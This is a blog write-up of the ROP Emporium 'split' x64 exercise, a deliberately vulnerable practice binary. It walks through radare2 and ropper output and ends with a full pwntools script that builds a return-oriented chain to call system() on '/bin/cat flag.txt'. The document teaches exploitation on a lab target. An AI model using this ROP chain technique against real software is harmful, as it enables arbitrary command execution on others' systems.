ROP Emporium : Split
Hey folks!
Today we are gonna do the another little ROP and hopefully learn a little about the pwntools, for the binary we are going to use x64 from ROP emporium "Split"
Let's start with enumerating the binary, I am going to load it in radare2 by using r2, and pass aaa to analyze all flags and look for the interesting strings (if any)
So once you look in closely you'll see the
vaddr=0x00601060 paddr=0x00001060 ordinal=036 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
Let's take vaddr=0x00601060 and just save it, this is one of the important address we will need to make our ROP chain.
This out of the way, I started to look for the functions inside the binary by using afl command.Once I saw the functions inside the binary, my attention was caught by the sym.usefulFunction and sym.main, so I further disas them.Today we are gonna do the another little ROP and hopefully learn a little about the pwntools, for the binary we are going to use x64 from ROP emporium "Split"
Let's start with enumerating the binary, I am going to load it in radare2 by using r2, and pass aaa to analyze all flags and look for the interesting strings (if any)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@karma:~/Desktop/exploitation/ROP-Emporium/split# r2 split | |
| -- You are probably using an old version of r2, go checkout the git! | |
| [0x00400650]> aaa | |
| [x] Analyze all flags starting with sym. and entry0 (aa) | |
| [x] Analyze len bytes of instructions for references (aar) | |
| [x] Analyze function calls (aac) | |
| [x] Use -AA or aaaa to perform additional experimental analysis. | |
| [x] Constructing a function name for fcn.* and sym.func.* functions (aan) | |
| [0x00400650]> izz | |
| vaddr=0x00400034 paddr=0x00000034 ordinal=000 sz=10 len=4 section=LOAD0 type=utf16le string=@8\t@ | |
| vaddr=0x00400238 paddr=0x00000238 ordinal=001 sz=28 len=27 section=.interp type=ascii string=/lib64/ld-linux-x86-64.so.2 | |
| vaddr=0x004003e9 paddr=0x000003e9 ordinal=002 sz=10 len=9 section=.dynstr type=ascii string=libc.so.6 | |
| vaddr=0x004003f3 paddr=0x000003f3 ordinal=003 sz=5 len=4 section=.dynstr type=ascii string=puts | |
| vaddr=0x004003f8 paddr=0x000003f8 ordinal=004 sz=6 len=5 section=.dynstr type=ascii string=stdin | |
| vaddr=0x004003fe paddr=0x000003fe ordinal=005 sz=7 len=6 section=.dynstr type=ascii string=printf | |
| vaddr=0x00400405 paddr=0x00000405 ordinal=006 sz=6 len=5 section=.dynstr type=ascii string=fgets | |
| vaddr=0x0040040b paddr=0x0000040b ordinal=007 sz=7 len=6 section=.dynstr type=ascii string=memset | |
| vaddr=0x00400412 paddr=0x00000412 ordinal=008 sz=7 len=6 section=.dynstr type=ascii string=stdout | |
| vaddr=0x00400419 paddr=0x00000419 ordinal=009 sz=7 len=6 section=.dynstr type=ascii string=stderr | |
| vaddr=0x00400420 paddr=0x00000420 ordinal=010 sz=7 len=6 section=.dynstr type=ascii string=system | |
| vaddr=0x00400427 paddr=0x00000427 ordinal=011 sz=8 len=7 section=.dynstr type=ascii string=setvbuf | |
| vaddr=0x0040042f paddr=0x0000042f ordinal=012 sz=18 len=17 section=.dynstr type=ascii string=__libc_start_main | |
| vaddr=0x00400441 paddr=0x00000441 ordinal=013 sz=15 len=14 section=.dynstr type=ascii string=__gmon_start__ | |
| vaddr=0x00400450 paddr=0x00000450 ordinal=014 sz=12 len=11 section=.dynstr type=ascii string=GLIBC_2.2.5 | |
| vaddr=0x004005c1 paddr=0x000005c1 ordinal=015 sz=5 len=4 section=.plt type=ascii string=5B\n | |
| vaddr=0x004005c7 paddr=0x000005c7 ordinal=016 sz=5 len=4 section=.plt type=ascii string=%D\n | |
| vaddr=0x004005d1 paddr=0x000005d1 ordinal=017 sz=5 len=4 section=.plt type=ascii string=%B\n | |
| vaddr=0x004005e1 paddr=0x000005e1 ordinal=018 sz=5 len=4 section=.plt type=ascii string=%:\n | |
| vaddr=0x004005f1 paddr=0x000005f1 ordinal=019 sz=5 len=4 section=.plt type=ascii string=%2\n | |
| vaddr=0x00400601 paddr=0x00000601 ordinal=020 sz=5 len=4 section=.plt type=ascii string=%*\n | |
| vaddr=0x00400611 paddr=0x00000611 ordinal=021 sz=5 len=4 section=.plt type=ascii string=%"\n | |
| vaddr=0x00400820 paddr=0x00000820 ordinal=022 sz=6 len=5 section=.text type=ascii string=AWAVA | |
| vaddr=0x00400827 paddr=0x00000827 ordinal=023 sz=6 len=5 section=.text type=ascii string=AUATL | |
| vaddr=0x00400879 paddr=0x00000879 ordinal=024 sz=16 len=14 section=.text type=utf8 string=\b[]A\A]A^A_Ðf. blocks=Basic Latin,Latin-1 Supplement | |
| vaddr=0x004008a8 paddr=0x000008a8 ordinal=025 sz=22 len=21 section=.rodata type=ascii string=split by ROP Emporium | |
| vaddr=0x004008be paddr=0x000008be ordinal=026 sz=8 len=7 section=.rodata type=ascii string=64bits\n | |
| vaddr=0x004008c6 paddr=0x000008c6 ordinal=027 sz=9 len=8 section=.rodata type=ascii string=\nExiting | |
| vaddr=0x004008d0 paddr=0x000008d0 ordinal=028 sz=44 len=43 section=.rodata type=ascii string=Contriving a reason to ask user for data... | |
| vaddr=0x004008ff paddr=0x000008ff ordinal=029 sz=8 len=7 section=.rodata type=ascii string=/bin/ls | |
| vaddr=0x00400960 paddr=0x00000960 ordinal=030 sz=5 len=4 section=.eh_frame type=ascii string=\e\f\a\b | |
| vaddr=0x00400990 paddr=0x00000990 ordinal=031 sz=5 len=4 section=.eh_frame type=ascii string=\e\f\a\b | |
| vaddr=0x004009b7 paddr=0x000009b7 ordinal=032 sz=6 len=5 section=.eh_frame type=ascii string=;*3$" | |
| vaddr=0x004009da paddr=0x000009da ordinal=033 sz=5 len=4 section=.eh_frame type=ascii string=j\f\a\b | |
| vaddr=0x004009fa paddr=0x000009fa ordinal=034 sz=5 len=4 section=.eh_frame type=ascii string=M\f\a\b | |
| vaddr=0x00400a19 paddr=0x00000a19 ordinal=035 sz=5 len=4 section=.eh_frame type=ascii string=L\f\a\b | |
| vaddr=0x00601060 paddr=0x00001060 ordinal=036 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt | |
| vaddr=0x00000000 paddr=0x0000107a ordinal=037 sz=52 len=51 section=.comment type=ascii string=GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609 | |
| vaddr=0x00000001 paddr=0x00001801 ordinal=038 sz=11 len=10 section=.strtab type=ascii string=crtstuff.c | |
| vaddr=0x0000000c paddr=0x0000180c ordinal=039 sz=13 len=12 section=.strtab type=ascii string=__JCR_LIST__ | |
| vaddr=0x00000019 paddr=0x00001819 ordinal=040 sz=21 len=20 section=.strtab type=ascii string=deregister_tm_clones | |
| vaddr=0x0000002e paddr=0x0000182e ordinal=041 sz=22 len=21 section=.strtab type=ascii string=__do_global_dtors_aux | |
| vaddr=0x00000044 paddr=0x00001844 ordinal=042 sz=15 len=14 section=.strtab type=ascii string=completed.7585 | |
| vaddr=0x00000053 paddr=0x00001853 ordinal=043 sz=39 len=38 section=.strtab type=ascii string=__do_global_dtors_aux_fini_array_entry | |
| vaddr=0x0000007a paddr=0x0000187a ordinal=044 sz=12 len=11 section=.strtab type=ascii string=frame_dummy | |
| vaddr=0x00000086 paddr=0x00001886 ordinal=045 sz=31 len=30 section=.strtab type=ascii string=__frame_dummy_init_array_entry | |
| vaddr=0x000000a5 paddr=0x000018a5 ordinal=046 sz=8 len=7 section=.strtab type=ascii string=split.c | |
| vaddr=0x000000ad paddr=0x000018ad ordinal=047 sz=6 len=5 section=.strtab type=ascii string=pwnme | |
| vaddr=0x000000b3 paddr=0x000018b3 ordinal=048 sz=15 len=14 section=.strtab type=ascii string=usefulFunction | |
| vaddr=0x000000c2 paddr=0x000018c2 ordinal=049 sz=14 len=13 section=.strtab type=ascii string=__FRAME_END__ | |
| vaddr=0x000000d0 paddr=0x000018d0 ordinal=050 sz=12 len=11 section=.strtab type=ascii string=__JCR_END__ | |
| vaddr=0x000000dc paddr=0x000018dc ordinal=051 sz=17 len=16 section=.strtab type=ascii string=__init_array_end | |
| vaddr=0x000000ed paddr=0x000018ed ordinal=052 sz=9 len=8 section=.strtab type=ascii string=_DYNAMIC | |
| vaddr=0x000000f6 paddr=0x000018f6 ordinal=053 sz=19 len=18 section=.strtab type=ascii string=__init_array_start | |
| vaddr=0x00000109 paddr=0x00001909 ordinal=054 sz=19 len=18 section=.strtab type=ascii string=__GNU_EH_FRAME_HDR | |
| vaddr=0x0000011c paddr=0x0000191c ordinal=055 sz=22 len=21 section=.strtab type=ascii string=_GLOBAL_OFFSET_TABLE_ | |
| vaddr=0x00000132 paddr=0x00001932 ordinal=056 sz=16 len=15 section=.strtab type=ascii string=__libc_csu_fini | |
| vaddr=0x00000142 paddr=0x00001942 ordinal=057 sz=28 len=27 section=.strtab type=ascii string=_ITM_deregisterTMCloneTable | |
| vaddr=0x0000015e paddr=0x0000195e ordinal=058 sz=20 len=19 section=.strtab type=ascii string=stdout@@GLIBC_2.2.5 | |
| vaddr=0x00000172 paddr=0x00001972 ordinal=059 sz=18 len=17 section=.strtab type=ascii string=puts@@GLIBC_2.2.5 | |
| vaddr=0x00000184 paddr=0x00001984 ordinal=060 sz=19 len=18 section=.strtab type=ascii string=stdin@@GLIBC_2.2.5 | |
| vaddr=0x00000197 paddr=0x00001997 ordinal=061 sz=7 len=6 section=.strtab type=ascii string=_edata | |
| vaddr=0x0000019e paddr=0x0000199e ordinal=062 sz=20 len=19 section=.strtab type=ascii string=system@@GLIBC_2.2.5 | |
| vaddr=0x000001b2 paddr=0x000019b2 ordinal=063 sz=20 len=19 section=.strtab type=ascii string=printf@@GLIBC_2.2.5 | |
| vaddr=0x000001c6 paddr=0x000019c6 ordinal=064 sz=20 len=19 section=.strtab type=ascii string=memset@@GLIBC_2.2.5 | |
| vaddr=0x000001da paddr=0x000019da ordinal=065 sz=31 len=30 section=.strtab type=ascii string=__libc_start_main@@GLIBC_2.2.5 | |
| vaddr=0x000001f9 paddr=0x000019f9 ordinal=066 sz=19 len=18 section=.strtab type=ascii string=fgets@@GLIBC_2.2.5 | |
| vaddr=0x0000020c paddr=0x00001a0c ordinal=067 sz=13 len=12 section=.strtab type=ascii string=__data_start | |
| vaddr=0x00000219 paddr=0x00001a19 ordinal=068 sz=15 len=14 section=.strtab type=ascii string=__gmon_start__ | |
| vaddr=0x00000228 paddr=0x00001a28 ordinal=069 sz=13 len=12 section=.strtab type=ascii string=__dso_handle | |
| vaddr=0x00000235 paddr=0x00001a35 ordinal=070 sz=15 len=14 section=.strtab type=ascii string=_IO_stdin_used | |
| vaddr=0x00000244 paddr=0x00001a44 ordinal=071 sz=13 len=12 section=.strtab type=ascii string=usefulString | |
| vaddr=0x00000251 paddr=0x00001a51 ordinal=072 sz=16 len=15 section=.strtab type=ascii string=__libc_csu_init | |
| vaddr=0x00000261 paddr=0x00001a61 ordinal=073 sz=12 len=11 section=.strtab type=ascii string=__bss_start | |
| vaddr=0x0000026d paddr=0x00001a6d ordinal=074 sz=5 len=4 section=.strtab type=ascii string=main | |
| vaddr=0x00000272 paddr=0x00001a72 ordinal=075 sz=21 len=20 section=.strtab type=ascii string=setvbuf@@GLIBC_2.2.5 | |
| vaddr=0x00000287 paddr=0x00001a87 ordinal=076 sz=20 len=19 section=.strtab type=ascii string=_Jv_RegisterClasses | |
| vaddr=0x0000029b paddr=0x00001a9b ordinal=077 sz=12 len=11 section=.strtab type=ascii string=__TMC_END__ | |
| vaddr=0x000002a7 paddr=0x00001aa7 ordinal=078 sz=26 len=25 section=.strtab type=ascii string=_ITM_registerTMCloneTable | |
| vaddr=0x000002c1 paddr=0x00001ac1 ordinal=079 sz=20 len=19 section=.strtab type=ascii string=stderr@@GLIBC_2.2.5 | |
| vaddr=0x00000001 paddr=0x00001ad6 ordinal=080 sz=8 len=7 section=.shstrtab type=ascii string=.symtab | |
| vaddr=0x00000009 paddr=0x00001ade ordinal=081 sz=8 len=7 section=.shstrtab type=ascii string=.strtab | |
| vaddr=0x00000011 paddr=0x00001ae6 ordinal=082 sz=10 len=9 section=.shstrtab type=ascii string=.shstrtab | |
| vaddr=0x0000001b paddr=0x00001af0 ordinal=083 sz=8 len=7 section=.shstrtab type=ascii string=.interp | |
| vaddr=0x00000023 paddr=0x00001af8 ordinal=084 sz=14 len=13 section=.shstrtab type=ascii string=.note.ABI-tag | |
| vaddr=0x00000031 paddr=0x00001b06 ordinal=085 sz=19 len=18 section=.shstrtab type=ascii string=.note.gnu.build-id | |
| vaddr=0x00000044 paddr=0x00001b19 ordinal=086 sz=10 len=9 section=.shstrtab type=ascii string=.gnu.hash | |
| vaddr=0x0000004e paddr=0x00001b23 ordinal=087 sz=8 len=7 section=.shstrtab type=ascii string=.dynsym | |
| vaddr=0x00000056 paddr=0x00001b2b ordinal=088 sz=8 len=7 section=.shstrtab type=ascii string=.dynstr | |
| vaddr=0x0000005e paddr=0x00001b33 ordinal=089 sz=13 len=12 section=.shstrtab type=ascii string=.gnu.version | |
| vaddr=0x0000006b paddr=0x00001b40 ordinal=090 sz=15 len=14 section=.shstrtab type=ascii string=.gnu.version_r | |
| vaddr=0x0000007a paddr=0x00001b4f ordinal=091 sz=10 len=9 section=.shstrtab type=ascii string=.rela.dyn | |
| vaddr=0x00000084 paddr=0x00001b59 ordinal=092 sz=10 len=9 section=.shstrtab type=ascii string=.rela.plt | |
| vaddr=0x0000008e paddr=0x00001b63 ordinal=093 sz=6 len=5 section=.shstrtab type=ascii string=.init | |
| vaddr=0x00000094 paddr=0x00001b69 ordinal=094 sz=9 len=8 section=.shstrtab type=ascii string=.plt.got | |
| vaddr=0x0000009d paddr=0x00001b72 ordinal=095 sz=6 len=5 section=.shstrtab type=ascii string=.text | |
| vaddr=0x000000a3 paddr=0x00001b78 ordinal=096 sz=6 len=5 section=.shstrtab type=ascii string=.fini | |
| vaddr=0x000000a9 paddr=0x00001b7e ordinal=097 sz=8 len=7 section=.shstrtab type=ascii string=.rodata | |
| vaddr=0x000000b1 paddr=0x00001b86 ordinal=098 sz=14 len=13 section=.shstrtab type=ascii string=.eh_frame_hdr | |
| vaddr=0x000000bf paddr=0x00001b94 ordinal=099 sz=10 len=9 section=.shstrtab type=ascii string=.eh_frame | |
| vaddr=0x000000c9 paddr=0x00001b9e ordinal=100 sz=12 len=11 section=.shstrtab type=ascii string=.init_array | |
| vaddr=0x000000d5 paddr=0x00001baa ordinal=101 sz=12 len=11 section=.shstrtab type=ascii string=.fini_array | |
| vaddr=0x000000e1 paddr=0x00001bb6 ordinal=102 sz=5 len=4 section=.shstrtab type=ascii string=.jcr | |
| vaddr=0x000000e6 paddr=0x00001bbb ordinal=103 sz=9 len=8 section=.shstrtab type=ascii string=.dynamic | |
| vaddr=0x000000ef paddr=0x00001bc4 ordinal=104 sz=9 len=8 section=.shstrtab type=ascii string=.got.plt | |
| vaddr=0x000000f8 paddr=0x00001bcd ordinal=105 sz=6 len=5 section=.shstrtab type=ascii string=.data | |
| vaddr=0x000000fe paddr=0x00001bd3 ordinal=106 sz=5 len=4 section=.shstrtab type=ascii string=.bss | |
| vaddr=0x00000103 paddr=0x00001bd8 ordinal=107 sz=9 len=8 section=.shstrtab type=ascii string=.comment |
So once you look in closely you'll see the
vaddr=0x00601060 paddr=0x00001060 ordinal=036 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
Let's take vaddr=0x00601060 and just save it, this is one of the important address we will need to make our ROP chain.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [0x00400650]> afl | |
| 0x00400048 1 164 fcn.00400048 | |
| 0x004005a0 3 26 sym._init | |
| 0x004005d0 2 16 -> 32 sym.imp.puts | |
| 0x004005e0 2 16 -> 48 sym.imp.system | |
| 0x004005f0 2 16 -> 48 sym.imp.printf | |
| 0x00400600 2 16 -> 48 sym.imp.memset | |
| 0x00400610 2 16 -> 48 sym.imp.__libc_start_main | |
| 0x00400620 2 16 -> 48 sym.imp.fgets | |
| 0x00400630 2 16 -> 48 sym.imp.setvbuf | |
| 0x00400640 1 16 sub.__gmon_start___248_640 | |
| 0x00400650 1 41 entry0 | |
| 0x00400680 4 50 -> 41 sym.deregister_tm_clones | |
| 0x004006c0 3 53 sym.register_tm_clones | |
| 0x00400700 3 28 sym.__do_global_dtors_aux | |
| 0x00400720 4 38 -> 35 entry1.init | |
| 0x00400746 1 111 sym.main | |
| 0x004007b5 1 82 sym.pwnme | |
| 0x00400807 1 17 sym.usefulFunction | |
| 0x00400820 4 101 sym.__libc_csu_init | |
| 0x00400890 1 2 sym.__libc_csu_fini | |
| 0x00400894 1 9 sym._fini | |
| [0x00400650]> pdf @ sym.main | |
| ;-- main: | |
| / (fcn) sym.main 111 | |
| | sym.main (); | |
| | ; DATA XREF from 0x0040066d (entry0) | |
| | 0x00400746 55 push rbp | |
| | 0x00400747 4889e5 mov rbp, rsp | |
| | 0x0040074a 488b052f0920. mov rax, qword [obj.stdout] ; [0x601080:8]=0 | |
| | 0x00400751 b900000000 mov ecx, 0 | |
| | 0x00400756 ba02000000 mov edx, 2 | |
| | 0x0040075b be00000000 mov esi, 0 | |
| | 0x00400760 4889c7 mov rdi, rax | |
| | 0x00400763 e8c8feffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char*buf, int mode, size_t size) | |
| | 0x00400768 488b05310920. mov rax, qword [obj.stderr] ; [0x6010a0:8]=0 | |
| | 0x0040076f b900000000 mov ecx, 0 | |
| | 0x00400774 ba02000000 mov edx, 2 | |
| | 0x00400779 be00000000 mov esi, 0 | |
| | 0x0040077e 4889c7 mov rdi, rax | |
| | 0x00400781 e8aafeffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char*buf, int mode, size_t size) | |
| | 0x00400786 bfa8084000 mov edi, str.split_by_ROP_Emporium ; 0x4008a8 ; "split by ROP Emporium" | |
| | 0x0040078b e840feffff call sym.imp.puts ; sym.imp.memset-0x30 ; void *memset(void *s, int c, size_t n) | |
| | 0x00400790 bfbe084000 mov edi, str.64bits_n ; 0x4008be ; "64bits\n" | |
| | 0x00400795 e836feffff call sym.imp.puts ; sym.imp.memset-0x30 ; void *memset(void *s, int c, size_t n) | |
| | 0x0040079a b800000000 mov eax, 0 | |
| | 0x0040079f e811000000 call sym.pwnme | |
| | 0x004007a4 bfc6084000 mov edi, str._nExiting ; 0x4008c6 ; "\nExiting" | |
| | 0x004007a9 e822feffff call sym.imp.puts ; sym.imp.memset-0x30 ; void *memset(void *s, int c, size_t n) | |
| | 0x004007ae b800000000 mov eax, 0 | |
| | 0x004007b3 5d pop rbp | |
| \ 0x004007b4 c3 ret | |
| [0x00400650]> pdf @ sym.usefulFunction | |
| / (fcn) sym.usefulFunction 17 | |
| | sym.usefulFunction (); | |
| | 0x00400807 55 push rbp | |
| | 0x00400808 4889e5 mov rbp, rsp | |
| | 0x0040080b bfff084000 mov edi, str._bin_ls ; 0x4008ff ; "/bin/ls" | |
| | 0x00400810 e8cbfdffff call sym.imp.system ; int system(const char *string) | |
| | 0x00400815 90 nop | |
| | 0x00400816 5d pop rbp | |
| \ 0x00400817 c3 ret | |
| [0x00400650]> |
Now as in the snippet above I took system address from usefulFunction i.e
0x00400810
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@karma:~/Desktop/exploitation/ROP-Emporium/split# ropper --file split --search "pop rdi;" | |
| [INFO] Load gadgets from cache | |
| [LOAD] loading... 100% | |
| [LOAD] removing double gadgets... 100% | |
| [INFO] Searching for gadgets: pop rdi; | |
| [INFO] File: split | |
| 0x0000000000400883: pop rdi; ret; |
So now we have the final element, and we can start building our exploit.
Once the exploit is complete it's what it looks like, refer the comments to get started with pwntools.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| #set the binary which is meant to be used | |
| elf=context.binary=ELF('split') | |
| #turn on the debugging to get info that's handy while debug | |
| context.log_level='DEBUG' | |
| #address obtained via the izz | |
| address = 0x00601060 | |
| #0x00400810 system from the usefulFunction | |
| sys = 0x400810 | |
| #start the process to get the buffer size | |
| io=process(elf.path) | |
| #send the cyclic pattern | |
| io.sendline(cyclic(128)) | |
| #wait for the binary to crash | |
| io.wait() | |
| #open the core file | |
| core=io.corefile | |
| #get the RSP | |
| stack=core.rsp | |
| #read the 4 bytes from the RSP | |
| pattern=core.read(stack,4) | |
| #get the BUF size | |
| size=cyclic_find(pattern) | |
| #set up the ROP chain | |
| #the address #0x0000000000400883: pop rdi; ret by the help of ropper | |
| #the flow goes like ROP+address (via izz) + system | |
| rop=p64(0x0400883,endian="little") | |
| #setting the p64 helps in resolving the address | |
| rop+=p64(0x601060,endian="little") | |
| rop+=p64(0x400810,endian="little") | |
| #setup the padding by utilizing the old info you get to find the buf size | |
| padding=cyclic(size) | |
| payload=padding+rop | |
| #restart the process to ROP | |
| io=process(elf.path) | |
| io.sendline(payload) | |
| io.wait_for_close() | |
| io.recv() | |
| print "Thank You,Exploit By Karma" |
So that's how manual ROP works, I will be posting the fully automatic ROP for split and automated BoF for ret2win next!
Thank You!!
Comments
Post a Comment